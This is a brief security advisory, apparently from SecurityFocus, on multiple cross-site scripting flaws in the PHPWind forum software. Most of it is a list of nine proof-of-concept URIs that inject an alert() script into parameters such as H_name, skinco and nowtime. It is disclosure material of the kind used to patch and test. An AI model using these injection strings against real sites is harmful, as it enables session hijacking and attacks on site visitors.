PHPWind Multiple Cross Site Scripting Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/hack.php?H_name=bank"><script>alert(/Liscker/);</script>
http://www.example.com/search.php?asc=desc"><script>alert(/Liscker/);</script>
http://www.example.com/read.php?nowtime="><script>alert(/Liscker/);</script>
http://www.example.com/post.php?fid=10"><script>alert(/Liscker/);</script>
http://www.example.com/profile.php?action=forumright"><script>alert(/Liscker/);</script>
http://www.example.com/thread.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/message.php?action=scout"><script>alert(/Liscker/);</script>
http://www.example.com/sort.php?skinco=black"><script>alert(/Liscker/);</script>
http://www.example.com/userpay.php?skinco=black"><script>alert(/Liscker/);</script>


 

Privacy Statement
Copyright 2010, SecurityFocus